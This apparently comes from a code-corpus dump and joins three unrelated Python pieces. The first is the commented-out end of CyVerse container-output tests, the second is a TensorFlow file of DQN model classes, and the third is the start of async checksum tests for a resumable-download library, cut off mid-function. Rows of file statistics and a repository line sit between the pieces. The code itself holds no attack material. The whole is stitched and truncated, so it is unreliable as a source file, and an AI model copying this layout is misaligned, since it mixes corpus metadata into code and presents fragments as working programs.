# workdir=testdir,
# image="docker://alpine:latest",
# command='touch excluded.output included.output',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': '',
# 'include': {'patterns': ['output'], 'names': []},
# 'exclude': {'patterns': [], 'names': [
# 'excluded.output'
# ]}
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_file_included)
# assert isfile(local_output_file_excluded)
# remove(local_output_file_included)
# remove(local_output_file_excluded)
#
# # check files were pushed to CyVerse
# files = list_files(remote_path, token)
# assert len(files) == 1
# assert join(remote_path, 'included.output') in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_no_input_and_directory_output_with_non_matching_case_pattern_and_excludes(
# remote_base_path):
# local_output_path = testdir
# local_output_file_included = join(local_output_path, f"included.{message}.output")
# local_output_file_excluded = join(local_output_path, "excluded.output")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_no_input_and_directory_output_with_non_matching_case_pattern_and_excludes',
# workdir=testdir,
# image="docker://alpine:latest",
# command='touch excluded.output included.$TAG.output',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': '',
# 'include': {'patterns': ['OUTPUT'], 'names': []},
# 'exclude': {'patterns': [], 'names': [
# 'excluded.output'
# ]}
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_file_included)
# assert isfile(local_output_file_excluded)
# remove(local_output_file_included)
# remove(local_output_file_excluded)
#
# # check files were pushed to CyVerse
# files = list_files(remote_path, token)
# assert len(files) == 1
# assert join(remote_path, f"included.{message}.output") in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_no_input_and_directory_output_with_already_existing_output(remote_base_path, file_name_1):
# local_output_path = testdir
# local_input_file_path_1 = join(testdir, file_name_1)
# local_output_file_included = join(local_output_path, f"included.{message}.output")
# local_output_file_excluded = join(local_output_path, "excluded.output")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_no_input_and_directory_output_with_excludes',
# workdir=testdir,
# image="docker://alpine:latest",
# command='touch excluded.output included.$TAG.output',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': '',
# 'include': {'patterns': ['output', file_name_1], 'names': []},
# 'exclude': {'patterns': [], 'names': [
# 'excluded.output'
# ]}
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep file
# with open(local_input_file_path_1, "w") as file1:
# file1.write('Hello, 1!')
# upload_file(local_input_file_path_1, remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_file_included)
# assert isfile(local_output_file_excluded)
# remove(local_output_file_included)
# remove(local_output_file_excluded)
#
# # check files were pushed to CyVerse
# files = list_files(remote_path, token)
# assert len(files) == 2
# assert join(remote_path, f"included.{message}.output") in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
| 36.412082 | 133 | 0.623037 | 3,947 | 33,754 | 4.977705 | 0.038004 | 0.059347 | 0.048862 | 0.032982 | 0.9632 | 0.959994 | 0.954293 | 0.949051 | 0.945284 | 0.939838 | 0 | 0.010009 | 0.254074 | 33,754 | 926 | 134 | 36.451404 | 0.770315 | 0.859246 | 0 | 0.594595 | 0 | 0 | 0.10352 | 0.030769 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0.027027 | 0.121622 | 0 | 0.148649 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
60a7c2a7cbe7f2774a1c10eaa6b009f4acbd5ea2 | 16,585 | py | Python | python/deepdnd/dqn_model.py | yinxusen/dqn-zork | fccb25a7067f94fe491528132089a1edeb127ca1 | [
"Apache-2.0"
] | 3 | 2019-09-18T07:40:26.000Z | 2020-08-19T16:03:01.000Z | python/deepdnd/dqn_model.py | yinxusen/dqn-zork | fccb25a7067f94fe491528132089a1edeb127ca1 | [
"Apache-2.0"
] | 5 | 2020-01-28T22:56:56.000Z | 2022-02-10T00:24:40.000Z | python/deepdnd/dqn_model.py | yinxusen/dqn-zork | fccb25a7067f94fe491528132089a1edeb127ca1 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2019 Xusen Yin
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import collections
import tensorflow as tf
import deepdnd.dqn_func as dqn
class TrainDQNModel(
collections.namedtuple(
'TrainModel',
('graph', 'model', 'q_actions',
'src_', 'src_len_',
'train_op', 'loss', 'action_idx_', 'expected_q_', 'b_weight_',
'train_summary_op', 'abs_loss',
'initializer'))):
pass
class EvalDQNModel(
collections.namedtuple(
'EvalModel',
('graph', 'model',
'q_actions', 'src_', 'src_len_',
'initializer'))):
pass
class BaseDQN(object):
def __init__(self, hp, src_embeddings=None, is_infer=False):
self.is_infer = is_infer
self.hp = hp
if src_embeddings is None:
self.src_embeddings = tf.get_variable(
name="src_embeddings", dtype=tf.float32,
shape=[hp.vocab_size, hp.embedding_size])
else:
self.src_embeddings = src_embeddings
self.global_step = tf.train.get_or_create_global_step()
self.optimizer = tf.train.AdamOptimizer(self.hp.learning_rate)
self.inputs = {
"src": tf.placeholder(tf.int32, [None, None]),
"src_len": tf.placeholder(tf.float32, [None]),
"action_idx": tf.placeholder(tf.int32, [None]),
"expected_q": tf.placeholder(tf.float32, [None]),
"b_weight": tf.placeholder(tf.float32, [None])
}
def get_q_actions(self):
raise NotImplementedError()
def get_train_op(self, q_actions):
raise NotImplementedError()
class LSTMEncoderDQN(BaseDQN):
def __init__(self, hp, src_embeddings=None, is_infer=False):
super(LSTMEncoderDQN, self).__init__(hp, src_embeddings, is_infer)
def get_q_actions(self):
inner_states = dqn.encoder_lstm(
self.inputs["src"], self.inputs["src_len"], self.src_embeddings,
self.hp.lstm_num_units, self.hp.lstm_num_layers)
q_actions = dqn.decoder_dense_classification(
inner_states[-1].c, self.hp.n_actions)
return q_actions
def get_train_op(self, q_actions):
loss, abs_loss = dqn.l2_loss_1Daction(
q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
self.hp.n_actions, self.inputs["b_weight"])
train_op = self.optimizer.minimize(loss, global_step=self.global_step)
return loss, train_op, abs_loss
class CNNEncoderDQN(BaseDQN):
def __init__(self, hp, src_embeddings=None, is_infer=False):
super(CNNEncoderDQN, self).__init__(hp, src_embeddings, is_infer)
self.filter_sizes = [3, 4, 5]
self.num_filters = hp.num_conv_filters
self.num_tokens = hp.num_tokens
self.l2_loss = tf.constant(0.0)
self.l2_reg_lambda = 0.5
self.pos_embeddings = tf.get_variable(
name="pos_embeddings", dtype=tf.float32,
shape=[self.num_tokens, self.hp.embedding_size])
def get_q_actions(self):
inner_states = dqn.encoder_cnn(
self.inputs["src"], self.src_embeddings, self.pos_embeddings,
self.filter_sizes, self.num_filters, self.hp.embedding_size)
q_actions = dqn.decoder_dense_classification(inner_states,
self.hp.n_actions)
return q_actions
def get_train_op(self, q_actions):
loss, abs_loss = dqn.l2_loss_1Daction(
q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
self.hp.n_actions, self.inputs["b_weight"])
train_op = self.optimizer.minimize(loss, global_step=self.global_step)
return loss, train_op, abs_loss
class CNNEncoderMultiLayerDQN(BaseDQN):
def __init__(self, hp, src_embeddings=None, is_infer=False):
super(CNNEncoderMultiLayerDQN, self).__init__(
hp, src_embeddings, is_infer)
self.filter_size = 3
self.num_layers = hp.num_layers
self.num_tokens = hp.num_tokens
self.pos_embeddings = tf.get_variable(
name="pos_embeddings", dtype=tf.float32,
shape=[self.num_tokens, self.hp.embedding_size])
def get_q_actions(self):
h_cnn = dqn.encoder_cnn_multilayers(
self.inputs["src"], self.src_embeddings, self.pos_embeddings,
self.num_layers, self.filter_size, self.hp.embedding_size)
pooled = tf.reduce_max(h_cnn, axis=1)
inner_states = tf.reshape(pooled, [-1, self.hp.embedding_size])
q_actions = dqn.decoder_dense_classification(inner_states,
self.hp.n_actions)
return q_actions
def get_train_op(self, q_actions):
loss, abs_loss = dqn.l2_loss_1Daction(
q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
self.hp.n_actions, self.inputs["b_weight"])
train_op = self.optimizer.minimize(loss, global_step=self.global_step)
return loss, train_op, abs_loss
class MultiChannelCNNEncoderDQN(CNNEncoderDQN):
def __init__(self, hp, src_embeddings=None, is_infer=False):
super(MultiChannelCNNEncoderDQN, self).__init__(
hp, src_embeddings, is_infer)
self.inputs = {
"src": tf.placeholder(tf.int32, [None, None, None]),
"src_len": tf.placeholder(tf.float32, [None, None]),
"action_idx": tf.placeholder(tf.int32, [None]),
"expected_q": tf.placeholder(tf.float32, [None]),
"b_weight": tf.placeholder(tf.float32, [None])
}
def get_q_actions(self):
inner_states = dqn.encoder_cnn_multichannels(
self.inputs["src"], self.inputs["src_len"], self.src_embeddings,
self.filter_sizes, self.num_filters, self.hp.embedding_size,
self.hp.num_channels)
q_actions = dqn.decoder_dense_classification(inner_states,
self.hp.n_actions)
return q_actions
def get_train_op(self, q_actions):
loss, abs_loss = dqn.l2_loss_1Daction(
q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
self.hp.n_actions, self.inputs["b_weight"])
train_op = self.optimizer.minimize(loss, global_step=self.global_step)
return loss, train_op, abs_loss
def create_train_model(model_creator, hp):
graph = tf.Graph()
with graph.as_default():
model = model_creator(hp)
initializer = tf.global_variables_initializer
inputs = model.inputs
src_placeholder = inputs["src"]
src_len_placeholder = inputs["src_len"]
action_idx_placeholder = inputs["action_idx"]
expected_q_placeholder = inputs["expected_q"]
b_weight_placeholder = inputs["b_weight"]
q_actions = model.get_q_actions()
loss, train_op, abs_loss = model.get_train_op(q_actions)
loss_summary = tf.summary.scalar("loss", loss)
train_summary_op = tf.summary.merge([loss_summary])
return TrainDQNModel(
graph=graph, model=model, q_actions=q_actions,
src_=src_placeholder,
src_len_=src_len_placeholder,
train_op=train_op, action_idx_=action_idx_placeholder,
expected_q_=expected_q_placeholder,
b_weight_=b_weight_placeholder,
loss=loss,
train_summary_op=train_summary_op,
abs_loss=abs_loss,
initializer=initializer)
def create_eval_model(model_creator, hp):
graph = tf.Graph()
with graph.as_default():
model = model_creator(hp, is_infer=True)
initializer = tf.global_variables_initializer
inputs = model.inputs
src_placeholder = inputs["src"]
src_len_placeholder = inputs["src_len"]
q_actions = model.get_q_actions()
return EvalDQNModel(
graph=graph, model=model,
q_actions=q_actions,
src_=src_placeholder,
src_len_=src_len_placeholder,
initializer=initializer)
class TrainDQNGenModel(
collections.namedtuple(
'TrainModel',
('graph', 'model', 'q_actions',
'src_', 'src_len_',
'train_op', 'loss', 'action_idx_', 'expected_q_',
'action_len_', 'b_weight_',
'train_summary_op', 'abs_loss',
'initializer'))):
pass
class EvalDQNGenModel(
collections.namedtuple(
'EvalModel',
('graph', 'model',
'q_actions', 'src_', 'src_len_',
'initializer'))):
pass
class LSTMEncoderDecoderDQN(BaseDQN):
def __init__(self, hp, src_embeddings=None, tgt_embeddings=None,
is_infer=False):
super(LSTMEncoderDecoderDQN, self).__init__(
hp, src_embeddings, is_infer)
# redefine inputs, notice the shape of action_idx
self.inputs = {
"src": tf.placeholder(tf.int32, [None, None]),
"src_len": tf.placeholder(tf.float32, [None]),
"action_idx": tf.placeholder(tf.int32, [None, None]),
"expected_q": tf.placeholder(tf.float32, [None]),
"action_len": tf.placeholder(tf.int32, [None]),
"b_weight": tf.placeholder(tf.float32, [None])
}
if tgt_embeddings is None:
self.tgt_embeddings = tf.get_variable(
name="tgt_embeddings", dtype=tf.float32,
shape=[self.hp.tgt_vocab_size, self.hp.embedding_size])
else:
self.tgt_embeddings = tgt_embeddings
def get_q_actions(self):
inner_states = dqn.encoder_lstm(
self.inputs["src"], self.inputs["src_len"], self.src_embeddings,
self.hp.lstm_num_units, self.hp.lstm_num_layers)
q_actions = dqn.decoder_fix_len_lstm(
inner_states, self.hp.tgt_vocab_size, self.tgt_embeddings,
self.hp.lstm_num_units, self.hp.lstm_num_layers,
self.hp.tgt_sos_id, self.hp.tgt_eos_id, self.hp.max_action_len)
return q_actions
def get_train_op(self, q_actions):
loss, abs_loss = dqn.l2_loss_2Daction(
q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
self.hp.tgt_vocab_size, self.inputs["action_len"],
self.hp.max_action_len, self.inputs["b_weight"])
train_op = self.optimizer.minimize(loss, global_step=self.global_step)
return loss, train_op, abs_loss
class CNNEncoderDecoderDQN(CNNEncoderDQN):
def __init__(
self, hp, src_embeddings=None, tgt_embeddings=None, is_infer=False):
super(CNNEncoderDecoderDQN, self).__init__(hp, src_embeddings, is_infer)
self.inputs = {
"src": tf.placeholder(tf.int32, [None, None]),
"src_len": tf.placeholder(tf.float32, [None]),
"action_idx": tf.placeholder(tf.int32, [None, None]),
"expected_q": tf.placeholder(tf.float32, [None]),
"action_len": tf.placeholder(tf.int32, [None]),
"b_weight": tf.placeholder(tf.float32, [None])
}
if tgt_embeddings is None:
self.tgt_embeddings = tf.get_variable(
name="tgt_embeddings", dtype=tf.float32,
shape=[self.hp.tgt_vocab_size, self.hp.embedding_size])
else:
self.tgt_embeddings = tgt_embeddings
def get_q_actions(self):
inner_states = dqn.encoder_cnn_block(
self.inputs["src"], self.src_embeddings, self.pos_embeddings,
self.filter_sizes, self.num_filters, self.hp.embedding_size)
q_actions = dqn.decoder_fix_len_cnn(
inner_states, self.tgt_embeddings, self.pos_embeddings,
self.hp.tgt_vocab_size, self.hp.embedding_size,
self.filter_sizes, self.num_filters, self.hp.tgt_sos_id,
self.hp.max_action_len)
return q_actions
def get_train_op(self, q_actions):
loss, abs_loss = dqn.l2_loss_2Daction(
q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
self.hp.tgt_vocab_size, self.inputs["action_len"],
self.hp.max_action_len, self.inputs["b_weight"])
train_op = self.optimizer.minimize(loss, global_step=self.global_step)
return loss, train_op, abs_loss
class CNNEDMultiLayerDQN(BaseDQN):
def __init__(
self, hp, src_embeddings=None, tgt_embeddings=None, is_infer=False):
super(CNNEDMultiLayerDQN, self).__init__(hp, src_embeddings, is_infer)
self.filter_size = 3
self.num_layers = hp.num_layers
self.num_tokens = hp.num_tokens
self.pos_embeddings = tf.get_variable(
name="pos_embeddings", dtype=tf.float32,
shape=[self.num_tokens, self.hp.embedding_size])
self.inputs = {
"src": tf.placeholder(tf.int32, [None, None]),
"src_len": tf.placeholder(tf.float32, [None]),
"action_idx": tf.placeholder(tf.int32, [None, None]),
"expected_q": tf.placeholder(tf.float32, [None]),
"action_len": tf.placeholder(tf.int32, [None]),
"b_weight": tf.placeholder(tf.float32, [None])
}
if tgt_embeddings is None:
self.tgt_embeddings = tf.get_variable(
name="tgt_embeddings", dtype=tf.float32,
shape=[self.hp.tgt_vocab_size, self.hp.embedding_size])
else:
self.tgt_embeddings = tgt_embeddings
def get_q_actions(self):
inner_states = dqn.encoder_cnn_multilayers(
self.inputs["src"], self.src_embeddings, self.pos_embeddings,
self.num_layers, self.filter_size, self.hp.embedding_size)
q_actions = dqn.decoder_fix_len_cnn_multilayers(
inner_states, self.tgt_embeddings, self.pos_embeddings,
self.hp.tgt_vocab_size, self.hp.embedding_size,
self.num_layers, self.filter_size, self.hp.tgt_sos_id,
self.hp.max_action_len)
return q_actions
def get_train_op(self, q_actions):
loss, abs_loss = dqn.l2_loss_2Daction(
q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
self.hp.tgt_vocab_size, self.inputs["action_len"],
self.hp.max_action_len, self.inputs["b_weight"])
train_op = self.optimizer.minimize(loss, global_step=self.global_step)
return loss, train_op, abs_loss
def create_train_gen_model(model_creator, hp):
graph = tf.Graph()
with graph.as_default():
model = model_creator(hp)
initializer = tf.global_variables_initializer
inputs = model.inputs
src_placeholder = inputs["src"]
src_len_placeholder = inputs["src_len"]
action_idx_placeholder = inputs["action_idx"]
expected_q_placeholder = inputs["expected_q"]
action_len_placeholder = inputs["action_len"]
b_weight_placeholder = inputs["b_weight"]
q_actions = model.get_q_actions()
loss, train_op, abs_loss = model.get_train_op(q_actions)
loss_summary = tf.summary.scalar("loss", loss)
train_summary_op = tf.summary.merge([loss_summary])
return TrainDQNGenModel(
graph=graph, model=model, q_actions=q_actions,
src_=src_placeholder,
src_len_=src_len_placeholder,
train_op=train_op, action_idx_=action_idx_placeholder,
action_len_=action_len_placeholder,
b_weight_=b_weight_placeholder,
expected_q_=expected_q_placeholder, loss=loss,
abs_loss=abs_loss,
train_summary_op=train_summary_op,
initializer=initializer)
def create_eval_gen_model(model_creator, hp):
graph = tf.Graph()
with graph.as_default():
model = model_creator(hp, is_infer=True)
initializer = tf.global_variables_initializer
inputs = model.inputs
src_placeholder = inputs["src"]
src_len_placeholder = inputs["src_len"]
q_actions = model.get_q_actions()
return EvalDQNGenModel(
graph=graph, model=model,
q_actions=q_actions,
src_=src_placeholder,
src_len_=src_len_placeholder,
initializer=initializer)
| 39.582339 | 80 | 0.646608 | 2,095 | 16,585 | 4.789976 | 0.092124 | 0.047035 | 0.041854 | 0.032885 | 0.853911 | 0.837569 | 0.82292 | 0.803288 | 0.792925 | 0.785351 | 0 | 0.008473 | 0.245644 | 16,585 | 418 | 81 | 39.677033 | 0.793622 | 0.035876 | 0 | 0.769679 | 0 | 0 | 0.065761 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081633 | false | 0.011662 | 0.008746 | 0 | 0.177843 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
60c3da5ec3379b5f52444a228eb070aff1ba4495 | 30,034 | py | Python | tests_async/unit/requests/test_download.py | renovate-bot/google-resumable-media-python | 1f01b88d0ce05ca561359de1ad89b47c6c60c9b7 | [
"Apache-2.0"
] | null | null | null | tests_async/unit/requests/test_download.py | renovate-bot/google-resumable-media-python | 1f01b88d0ce05ca561359de1ad89b47c6c60c9b7 | [
"Apache-2.0"
] | null | null | null | tests_async/unit/requests/test_download.py | renovate-bot/google-resumable-media-python | 1f01b88d0ce05ca561359de1ad89b47c6c60c9b7 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import http.client
import io
import aiohttp
import mock
import pytest
from google.resumable_media import common
from google._async_resumable_media import _helpers
from google._async_resumable_media.requests import download as download_mod
from tests.unit.requests import test_download as sync_test
EXPECTED_TIMEOUT = aiohttp.ClientTimeout(
total=None, connect=61, sock_read=60, sock_connect=None
)
class TestDownload(object):
@pytest.mark.asyncio
async def test__write_to_stream_no_hash_check(self):
stream = io.BytesIO()
download = download_mod.Download(sync_test.EXAMPLE_URL, stream=stream)
chunk1 = b"right now, "
chunk2 = b"but a little later"
response = _mock_response(chunks=[chunk1, chunk2], headers={})
ret_val = await download._write_to_stream(response)
assert ret_val is None
assert stream.getvalue() == chunk1 + chunk2
@pytest.mark.parametrize("checksum", ["md5", "crc32c", None])
@pytest.mark.asyncio
async def test__write_to_stream_with_hash_check_success(self, checksum):
stream = io.BytesIO()
download = download_mod.Download(
sync_test.EXAMPLE_URL, stream=stream, checksum=checksum
)
chunk1 = b"first chunk, count starting at 0. "
chunk2 = b"second chunk, or chunk 1, which is better? "
chunk3 = b"ordinals and numerals and stuff."
header_value = "crc32c=qmNCyg==,md5=fPAJHnnoi/+NadyNxT2c2w=="
headers = {_helpers._HASH_HEADER: header_value}
response = _mock_response(chunks=[chunk1, chunk2, chunk3], headers=headers)
ret_val = await download._write_to_stream(response)
assert ret_val is None
assert stream.getvalue() == chunk1 + chunk2 + chunk3
@pytest.mark.parametrize("checksum", ["md5", "crc32c"])
@pytest.mark.asyncio
async def test__write_to_stream_with_hash_check_fail(self, checksum):
stream = io.BytesIO()
download = download_mod.Download(
sync_test.EXAMPLE_URL, stream=stream, checksum=checksum
)
chunk1 = b"first chunk, count starting at 0. "
chunk2 = b"second chunk, or chunk 1, which is better? "
chunk3 = b"ordinals and numerals and stuff."
bad_checksum = "d3JvbmcgbiBtYWRlIHVwIQ=="
header_value = "crc32c={bad},md5={bad}".format(bad=bad_checksum)
headers = {_helpers._HASH_HEADER: header_value}
response = _mock_response(chunks=[chunk1, chunk2, chunk3], headers=headers)
with pytest.raises(common.DataCorruption) as exc_info:
await download._write_to_stream(response)
assert not download.finished
error = exc_info.value
assert error.response is response
assert len(error.args) == 1
if checksum == "md5":
good_checksum = "fPAJHnnoi/+NadyNxT2c2w=="
else:
good_checksum = "qmNCyg=="
msg = download_mod._CHECKSUM_MISMATCH.format(
sync_test.EXAMPLE_URL,
bad_checksum,
good_checksum,
checksum_type=checksum.upper(),
)
assert error.args[0] == msg
@pytest.mark.asyncio
async def test__write_to_stream_with_invalid_checksum_type(self):
BAD_CHECKSUM_TYPE = "badsum"
stream = io.BytesIO()
download = download_mod.Download(
sync_test.EXAMPLE_URL, stream=stream, checksum=BAD_CHECKSUM_TYPE
)
chunk1 = b"first chunk, count starting at 0. "
chunk2 = b"second chunk, or chunk 1, which is better? "
chunk3 = b"ordinals and numerals and stuff."
bad_checksum = "d3JvbmcgbiBtYWRlIHVwIQ=="
header_value = "crc32c={bad},md5={bad}".format(bad=bad_checksum)
headers = {_helpers._HASH_HEADER: header_value}
response = _mock_response(chunks=[chunk1, chunk2, chunk3], headers=headers)
with pytest.raises(ValueError) as exc_info:
await download._write_to_stream(response)
assert not download.finished
error = exc_info.value
assert error.args[0] == "checksum must be ``'md5'``, ``'crc32c'`` or ``None``"
@pytest.mark.asyncio
async def _consume_helper(
self,
stream=None,
end=65536,
headers=None,
chunks=(),
response_headers=None,
checksum="md5",
timeout=None,
):
download = download_mod.Download(
sync_test.EXAMPLE_URL, stream=stream, end=end, headers=headers
)
transport = mock.AsyncMock(spec=["request"])
mockResponse = _mock_response(chunks=chunks, headers=response_headers)
transport.request = mock.AsyncMock(spec=["__call__"], return_value=mockResponse)
assert not download.finished
if timeout is not None:
ret_val = await download.consume(transport, timeout=timeout)
else:
ret_val = await download.consume(transport)
assert ret_val is transport.request.return_value
called_kwargs = {
"data": None,
"headers": download._headers,
"timeout": EXPECTED_TIMEOUT if timeout is None else timeout,
}
if chunks:
assert stream is not None
called_kwargs["stream"] = True
transport.request.assert_called_once_with(
"GET", sync_test.EXAMPLE_URL, **called_kwargs
)
range_bytes = "bytes={:d}-{:d}".format(0, end)
assert download._headers["range"] == range_bytes
assert download.finished
return transport
@pytest.mark.asyncio
async def test_consume(self):
await self._consume_helper()
@pytest.mark.asyncio
async def test_consume_with_custom_timeout(self):
await self._consume_helper(timeout=14.7)
@pytest.mark.parametrize("checksum", ["md5", "crc32c", None])
@pytest.mark.asyncio
async def test_consume_with_stream(self, checksum):
stream = io.BytesIO()
chunks = (b"up down ", b"charlie ", b"brown")
# transport = await self._consume_helper(stream=stream, chunks=chunks, checksum=checksum)
await self._consume_helper(stream=stream, chunks=chunks, checksum=checksum)
assert stream.getvalue() == b"".join(chunks)
@pytest.mark.parametrize("checksum", ["md5", "crc32c"])
@pytest.mark.asyncio
async def test_consume_with_stream_hash_check_success(self, checksum):
stream = io.BytesIO()
chunks = (b"up down ", b"charlie ", b"brown")
header_value = "crc32c=UNIQxg==,md5=JvS1wjMvfbCXgEGeaJJLDQ=="
headers = {_helpers._HASH_HEADER: header_value}
await self._consume_helper(
stream=stream, chunks=chunks, response_headers=headers, checksum=checksum
)
assert stream.getvalue() == b"".join(chunks)
@pytest.mark.parametrize("checksum", ["md5", "crc32c"])
@pytest.mark.asyncio
async def test_consume_with_stream_hash_check_fail(self, checksum):
stream = io.BytesIO()
download = download_mod.Download(
sync_test.EXAMPLE_URL, stream=stream, checksum=checksum
)
chunks = (b"zero zero", b"niner tango")
bad_checksum = "anVzdCBub3QgdGhpcyAxLA=="
header_value = "crc32c={bad},md5={bad}".format(bad=bad_checksum)
headers = {_helpers._HASH_HEADER: header_value}
transport = mock.AsyncMock(spec=["request"])
mockResponse = _mock_response(chunks=chunks, headers=headers)
transport.request = mock.AsyncMock(spec=["__call__"], return_value=mockResponse)
assert not download.finished
with pytest.raises(common.DataCorruption) as exc_info:
await download.consume(transport)
assert stream.getvalue() == b"".join(chunks)
assert download.finished
assert download._headers == {}
error = exc_info.value
assert error.response is transport.request.return_value
assert len(error.args) == 1
if checksum == "md5":
good_checksum = "1A/dxEpys717C6FH7FIWDw=="
else:
good_checksum = "GvNZlg=="
msg = download_mod._CHECKSUM_MISMATCH.format(
sync_test.EXAMPLE_URL,
bad_checksum,
good_checksum,
checksum_type=checksum.upper(),
)
assert error.args[0] == msg
# Check mocks.
transport.request.assert_called_once_with(
"GET",
sync_test.EXAMPLE_URL,
data=None,
headers={},
stream=True,
timeout=EXPECTED_TIMEOUT,
)
@pytest.mark.asyncio
async def test_consume_with_headers(self):
headers = {} # Empty headers
end = 16383
await self._consume_helper(end=end, headers=headers)
range_bytes = "bytes={:d}-{:d}".format(0, end)
# Make sure the headers have been modified.
assert headers == {"range": range_bytes}
class TestRawDownload(object):
@pytest.mark.asyncio
async def test__write_to_stream_no_hash_check(self):
stream = io.BytesIO()
download = download_mod.RawDownload(sync_test.EXAMPLE_URL, stream=stream)
chunk1 = b"right now, "
chunk2 = b"but a little later"
response = _mock_raw_response(chunks=[chunk1, chunk2], headers={})
ret_val = await download._write_to_stream(response)
assert ret_val is None
assert stream.getvalue() == chunk1 + chunk2
@pytest.mark.parametrize("checksum", ["md5", "crc32c"])
@pytest.mark.asyncio
async def test__write_to_stream_with_hash_check_success(self, checksum):
stream = io.BytesIO()
download = download_mod.RawDownload(
sync_test.EXAMPLE_URL, stream=stream, checksum=checksum
)
chunk1 = b"first chunk, count starting at 0. "
chunk2 = b"second chunk, or chunk 1, which is better? "
chunk3 = b"ordinals and numerals and stuff."
header_value = "crc32c=qmNCyg==,md5=fPAJHnnoi/+NadyNxT2c2w=="
headers = {_helpers._HASH_HEADER: header_value}
response = _mock_raw_response(chunks=[chunk1, chunk2, chunk3], headers=headers)
ret_val = await download._write_to_stream(response)
assert ret_val is None
assert stream.getvalue() == chunk1 + chunk2 + chunk3
@pytest.mark.parametrize("checksum", ["md5", "crc32c"])
@pytest.mark.asyncio
async def test__write_to_stream_with_hash_check_fail(self, checksum):
stream = io.BytesIO()
download = download_mod.RawDownload(
sync_test.EXAMPLE_URL, stream=stream, checksum=checksum
)
chunk1 = b"first chunk, count starting at 0. "
chunk2 = b"second chunk, or chunk 1, which is better? "
chunk3 = b"ordinals and numerals and stuff."
bad_checksum = "d3JvbmcgbiBtYWRlIHVwIQ=="
header_value = "crc32c={bad},md5={bad}".format(bad=bad_checksum)
headers = {_helpers._HASH_HEADER: header_value}
response = _mock_raw_response(chunks=[chunk1, chunk2, chunk3], headers=headers)
with pytest.raises(common.DataCorruption) as exc_info:
await download._write_to_stream(response)
assert not download.finished
error = exc_info.value
assert error.response is response
assert len(error.args) == 1
if checksum == "md5":
good_checksum = "fPAJHnnoi/+NadyNxT2c2w=="
else:
good_checksum = "qmNCyg=="
msg = download_mod._CHECKSUM_MISMATCH.format(
sync_test.EXAMPLE_URL,
bad_checksum,
good_checksum,
checksum_type=checksum.upper(),
)
assert error.args[0] == msg
@pytest.mark.asyncio
async def test__write_to_stream_with_invalid_checksum_type(self):
BAD_CHECKSUM_TYPE = "badsum"
stream = io.BytesIO()
download = download_mod.RawDownload(
sync_test.EXAMPLE_URL, stream=stream, checksum=BAD_CHECKSUM_TYPE
)
chunk1 = b"first chunk, count starting at 0. "
chunk2 = b"second chunk, or chunk 1, which is better? "
chunk3 = b"ordinals and numerals and stuff."
bad_checksum = "d3JvbmcgbiBtYWRlIHVwIQ=="
header_value = "crc32c={bad},md5={bad}".format(bad=bad_checksum)
headers = {_helpers._HASH_HEADER: header_value}
response = _mock_response(chunks=[chunk1, chunk2, chunk3], headers=headers)
with pytest.raises(ValueError) as exc_info:
await download._write_to_stream(response)
assert not download.finished
error = exc_info.value
assert error.args[0] == "checksum must be ``'md5'``, ``'crc32c'`` or ``None``"
async def _consume_helper(
self,
stream=None,
end=65536,
headers=None,
chunks=(),
response_headers=None,
checksum=None,
